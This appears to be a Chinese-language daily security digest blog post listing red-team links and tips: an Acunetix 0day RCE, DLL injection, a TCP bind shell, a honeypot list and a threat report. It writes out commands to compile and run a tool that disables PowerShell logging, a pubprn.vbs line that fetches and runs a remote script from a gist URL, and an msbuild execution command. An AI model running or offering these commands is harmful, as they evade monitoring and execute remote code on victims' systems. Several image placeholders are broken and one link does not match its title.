每日安全干货及动态

enter description here

1.subTee的代码备份

https://github.com/re4lity/subTee-gits-backups.git

enter description here
 

2.禁用PS日志记录

https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs

1
2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe DisablePSLogging.cs /reference:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
DisablePSLogging.exe

enter description here
 

3. Acunetix 0day RCE

https://github.com/dzonerzy/acunetix_0day
 

enter description here
 
enter description here
 

enter description here
 

4. Gmail 存在 XSS

 
enter description here
 
enter description here
 

5.中国互联网 安全领袖峰大会 —孙冰 PDF

https://github.com/deepchem/deepchem-gui

enter description here
 

6.Github蜜罐资源列表

https://github.com/paralax/awesome-honeypots

enter description here
 

7. 针对说俄语的企业的恶意邮件活动是利用漏洞和Windows office组件的组合来提供新的后门

http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/

enter description here
 

8.恶意PAYLOAD

1
2
3
cscript C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs localhost
“script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f3
21ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt”

enter description here
 

9. 如何用C#写注入一个DLL进程

http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread

enter description here

10. MSbuild —–PowaShell.csproj (具体poc文件 可进技术群 群文件中下载)

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe test.csproj

enter description here

11. TCP-bind shell

https://azeria-labs.com/tcp-bind-shell-in-assembly-arm-32-bit/[enter description here]22

enter description here

欢迎进入 即刻安全技术交流 :307283889 每日都会分享最新最好的干货